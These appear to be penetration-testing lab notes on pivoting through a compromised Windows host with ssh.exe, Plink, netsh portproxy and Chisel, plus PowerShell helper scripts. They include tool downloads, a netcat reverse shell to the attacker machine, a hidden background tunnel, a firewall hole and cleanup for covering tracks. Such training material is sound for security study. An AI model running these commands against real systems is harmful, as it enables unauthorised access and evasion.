
Port Forwarding with Windows Tools

19.3.1 - ssh.exe

Start by making sure the ssh server is running on the Kali machine

sudo systemctl start ssh

Check whether ssh.exe is present on the Windows machine and which OpenSSH version it is; remote dynamic port forwarding (-R with only a port) needs OpenSSH 7.6 or later

where ssh
ssh.exe -V

We can now create a remote dynamic port forward to our Kali machine. -N opens no remote shell, and -R with only a port tells the Kali sshd to open a SOCKS proxy on 127.0.0.1:9998 whose traffic is routed out through the Windows host

ssh -N -R 9998 kali@192.168.118.4

Check the SOCKS proxy port is open on Kali

ss -ntplu

Update proxychains4 to use this SOCKS proxy by appending socks5 127.0.0.1 9998 to the ProxyList at the end of the config, then confirm the entry

tail /etc/proxychains4.conf

19.3.2 - Plink

Before OpenSSH was so readily available on Windows, most network administrators' tools of choice were PuTTY and its command-line-only counterpart, Plink.

We can serve nc.exe from apache2 on Kali

sudo systemctl start apache2

Then copy nc.exe to the web root

find / -name nc.exe 2>/dev/null
sudo cp /usr/share/windows-resources/binaries/nc.exe /var/www/html/

We can then grab the file through PowerShell

powershell wget -Uri http://192.168.118.4/nc.exe -OutFile C:\Windows\Temp\nc.exe

We can then start a reverse shell back to a listener on Kali (port 4446)

C:\Windows\Temp\nc.exe -e cmd.exe 192.168.118.4 4446

Now locate plink.exe on Kali

find / -name plink.exe 2>/dev/null

Then copy it over to apache to retrieve it on the target

sudo cp /usr/share/windows-resources/binaries/plink.exe /var/www/html/
powershell wget -Uri http://192.168.118.4/plink.exe -OutFile C:\Windows\Temp\plink.exe

Pass the username (-l) and the password (-pw) on the command line. The -R argument binds 127.0.0.1:9833 on Kali and sends anything that connects to it to 127.0.0.1:3389, RDP on the Windows host. Plink also asks to cache the Kali host key on first connection; a blind reverse shell cannot answer that prompt, so the y has to be piped into the command.

C:\Windows\Temp\plink.exe -ssh -l kali -pw <YOUR PASSWORD HERE> -R 127.0.0.1:9833:127.0.0.1:3389 192.168.118.4

We can confirm the port has opened on the Kali machine

ss -ntplu

We should now be able to reach RDP on the Windows host through the forwarded port on localhost

xfreerdp /u:rdp_admin /p:P@ssw0rd! /v:127.0.0.1:9833
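The ssh.exe and Plink steps above, wrapped into a small PowerShell helper that is added here and is not part of the course notes: it checks whether the OpenSSH client on the foothold is new enough for remote dynamic forwarding (OpenSSH 7.6 or later) and builds that command, and otherwise launches Plink in the background with the host-key prompt answered. Assumed values, not on the original page: Kali at 192.168.118.4 with user kali, plink.exe already in C:\Windows\Temp; the function names are my own.

```powershell
# Added example (not from the course notes): pick ssh.exe or plink.exe on a
# Windows foothold and start a remote forward back to Kali.
# Assumptions (not on the original page): Kali is 192.168.118.4, the Kali
# user is 'kali', plink.exe has already been dropped in C:\Windows\Temp.

$KaliHost  = '192.168.118.4'
$KaliUser  = 'kali'
$PlinkPath = 'C:\Windows\Temp\plink.exe'

function Get-OpenSshVersion {
    # Returns the OpenSSH client version as [version], or $null if ssh.exe is absent.
    $ssh = Get-Command ssh.exe -ErrorAction SilentlyContinue
    if (-not $ssh) { return $null }
    # 'ssh -V' writes its banner to stderr, e.g. "OpenSSH_for_Windows_8.1p1, LibreSSL 3.0.2"
    $banner = (& $ssh.Source -V 2>&1 | Out-String)
    if ($banner -match 'OpenSSH\S*?_(\d+)\.(\d+)') {
        return [version]"$($Matches[1]).$($Matches[2])"
    }
    return $null
}

function Test-RemoteDynamicForwardSupport {
    # Remote *dynamic* forwarding (-R <port> with no target) was added in OpenSSH 7.6.
    param([version]$Version)
    return ($null -ne $Version) -and ($Version -ge [version]'7.6')
}

function Get-SshRemoteSocksCommand {
    # ssh.exe path: the Kali sshd opens a SOCKS listener on 127.0.0.1:$SocksPort.
    # StrictHostKeyChecking=no removes the host-key prompt; the password prompt
    # still needs an interactive shell unless key authentication is set up.
    param([int]$SocksPort = 9998)
    return "ssh.exe -N -o StrictHostKeyChecking=no -R $SocksPort $KaliUser@$KaliHost"
}

function Start-PlinkRemoteForward {
    # Plink path: -R binds 127.0.0.1:$RemotePort on Kali and relays it to
    # $LocalTarget as seen from the Windows host (RDP on the host by default).
    # Plink asks to cache the host key, which a blind reverse shell cannot answer,
    # so 'y' is piped in through cmd.exe. The password on the command line is
    # visible in process listings; treat it as burned after the engagement.
    param(
        [Parameter(Mandatory)][string]$Password,
        [int]$RemotePort = 9833,
        [string]$LocalTarget = '127.0.0.1:3389'
    )
    $plinkArgs = "-ssh -l $KaliUser -pw $Password -R 127.0.0.1:${RemotePort}:$LocalTarget $KaliHost"
    # Background process so the reverse shell stays usable; poll .HasExited to
    # see whether the tunnel died (wrong password, Kali sshd not running, ...).
    return Start-Process -FilePath 'cmd.exe' `
        -ArgumentList "/c echo y | $PlinkPath $plinkArgs" `
        -WindowStyle Hidden -PassThru
}

function Start-RemoteForward {
    # Prefer the native client when it is new enough, otherwise fall back to Plink.
    param([Parameter(Mandatory)][string]$Password)
    $ver = Get-OpenSshVersion
    if (Test-RemoteDynamicForwardSupport $ver) {
        Write-Host "ssh.exe $ver found; run this in the foreground and enter the password:"
        Write-Host (Get-SshRemoteSocksCommand)
    } else {
        Write-Host "ssh.exe missing or older than 7.6 (found: $ver); falling back to plink"
        Start-PlinkRemoteForward -Password $Password
    }
}

# Usage from the reverse shell (assumed password placeholder):
# Start-RemoteForward -Password '<YOUR PASSWORD HERE>'
```

Once either tunnel is up, `ss -ntplu` on Kali should show the new listener (9998 for the SOCKS proxy, 9833 for the RDP forward) bound to 127.0.0.1, exactly as in the manual steps.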

19.3.3 - netsh

There is also a native way to create a port forward on Windows: the built-in network configuration tool Netsh (Network Shell). Using Netsh, we can set up a port forward with the portproxy subcontext within the interface context. The scenario here is a machine on a LAN that we cannot reach directly, so we create a port forward on the dual-homed, WAN-accessible machine that listens on its WAN interface and relays packets to the SSH port on the LAN machine. Note that portproxy needs the IP Helper service running and an elevated shell.

We instruct netsh interface to add a portproxy rule from an IPv4 listener (listenaddress/listenport, the WAN-facing side) to an IPv4 destination (connectaddress/connectport, the LAN host and its port), hence v4tov4. The values below come from a different lab setup, with both addresses set to the pivot itself and port 8080 as the destination; for the SSH scenario used in the rest of this section, listenaddress is the pivot's WAN IP 192.168.50.64 and connectaddress/connectport point at port 22 on the LAN host.

netsh interface portproxy add v4tov4 listenport=2222 listenaddress=172.16.93.202 connectport=8080 connectaddress=172.16.93.202

We can confirm port 2222 is listening through netstat on the target

netstat -anp TCP | find "2222"

We can also confirm that the port forward is stored by issuing the show all command in the netsh interface portproxy subcontext.

netsh interface portproxy show all

If nmap reports the port as filtered, the Windows firewall is blocking inbound connections to 2222 even though portproxy is listening. We can use the netsh advfirewall subcontext to open it and name the rule something descriptive like port_forward_ssh_2222.

netsh advfirewall firewall add rule name="port_forward_ssh_2222" protocol=TCP dir=in localip=192.168.50.64 localport=2222 action=allow

Scanning from Kali shows 2222 as filtered before the firewall rule and open after it

sudo nmap -sS 192.168.50.64 -Pn -n -p2222

We should now be able to connect.

ssh database_admin@192.168.50.64 -p2222

We can delete the rule when we're done with the connection and are covering our tracks

netsh advfirewall firewall delete rule name="port_forward_ssh_2222"

We can also delete the port forward we created

netsh interface portproxy del v4tov4 listenport=2222 listenaddress=192.168.50.64
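The netsh procedure above (portproxy rule, firewall hole, verification, cleanup) as a PowerShell add/verify/remove helper. This is an added example, not the course's own code. Assumed values for the usage lines, since the page does not pair them this way: WAN-facing IP 192.168.50.64 on the pivot, a LAN target 172.16.50.215 on port 22, listener port 2222; the function names are mine.

```powershell
# Added example (not the course's own code): wrap the netsh portproxy and
# advfirewall steps into add / verify / remove functions so the pivot is both
# checked and cleaned up. Assumed values in the usage at the bottom (not on the
# page as a pairing): WAN IP 192.168.50.64 on the pivot, LAN target
# 172.16.50.215 port 22, listener port 2222.
# Run from an elevated PowerShell; portproxy relies on the IP Helper service
# (iphlpsvc), so it must be running.

function Add-PortProxyPivot {
    param(
        [Parameter(Mandatory)][string]$ListenAddress,   # IP on the pivot's WAN side
        [Parameter(Mandatory)][int]$ListenPort,
        [Parameter(Mandatory)][string]$ConnectAddress,  # LAN host we cannot reach directly
        [Parameter(Mandatory)][int]$ConnectPort,
        [string]$RuleName = "port_forward_ssh_$ListenPort"
    )
    # key=value pairs are quoted so PowerShell hands them to netsh as single tokens
    netsh interface portproxy add v4tov4 "listenport=$ListenPort" "listenaddress=$ListenAddress" `
        "connectport=$ConnectPort" "connectaddress=$ConnectAddress" | Out-Null
    if ($LASTEXITCODE -ne 0) { throw "portproxy add failed (elevated shell? IP Helper running?)" }

    # portproxy listens immediately, but the Windows firewall still makes the
    # port look 'filtered' from outside until an inbound allow rule exists.
    netsh advfirewall firewall add rule "name=$RuleName" protocol=TCP dir=in `
        "localip=$ListenAddress" "localport=$ListenPort" action=allow | Out-Null
    if ($LASTEXITCODE -ne 0) { throw "firewall rule add failed" }
}

function Test-PortProxyPivot {
    # True only when the rule is stored AND a socket is actually bound on the listener.
    param([string]$ListenAddress, [int]$ListenPort)
    $escaped = [regex]::Escape($ListenAddress)
    $stored = (netsh interface portproxy show all | Out-String) -match "$escaped\s+$ListenPort\s"
    $bound  = $null -ne (Get-NetTCPConnection -LocalAddress $ListenAddress -LocalPort $ListenPort `
                  -State Listen -ErrorAction SilentlyContinue)
    return ($stored -and $bound)
}

function Remove-PortProxyPivot {
    # Cleanup: drop the firewall hole first, then the forward itself.
    param([string]$ListenAddress, [int]$ListenPort, [string]$RuleName = "port_forward_ssh_$ListenPort")
    netsh advfirewall firewall delete rule "name=$RuleName" | Out-Null
    netsh interface portproxy delete v4tov4 "listenport=$ListenPort" "listenaddress=$ListenAddress" | Out-Null
}

# Usage (assumed addresses, see header):
Add-PortProxyPivot -ListenAddress 192.168.50.64 -ListenPort 2222 -ConnectAddress 172.16.50.215 -ConnectPort 22
Test-PortProxyPivot -ListenAddress 192.168.50.64 -ListenPort 2222
# ... from Kali: ssh database_admin@192.168.50.64 -p2222 ...
Remove-PortProxyPivot -ListenAddress 192.168.50.64 -ListenPort 2222
```

Test-PortProxyPivot deliberately checks both the stored rule and the bound socket: the rule survives in the registry even when the IP Helper service is stopped, in which case `show all` still lists it but nothing is listening and the nmap scan from Kali never goes to open.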

19.3.4 - Chisel.exe

Chisel tunnels over HTTP and works with either end as the server. The server must be started with the flag that matches the keyword the client uses: R:socks (reverse SOCKS, the listener opens on the server side, port 1080 by default) needs --reverse, while socks or 1080:socks (forward SOCKS, the listener opens on the client side) needs --socks5.

Reverse SOCKS proxy on Kali (chisel server on Kali, chisel.exe client on the Windows host; deliver chisel.exe the same way as nc.exe and plink.exe above)

chisel server -p 8000 --reverse
.\chisel.exe client 192.168.45.171:8000 R:socks

Forward SOCKS proxy through the Windows host (chisel.exe server on Windows, chisel client on Kali, SOCKS listener on Kali port 1080)

.\chisel.exe server -p 8000 --socks5
chisel client 172.168.16.93:8000 1080:socks

Either way, point proxychains at socks5 127.0.0.1 1080 on Kali.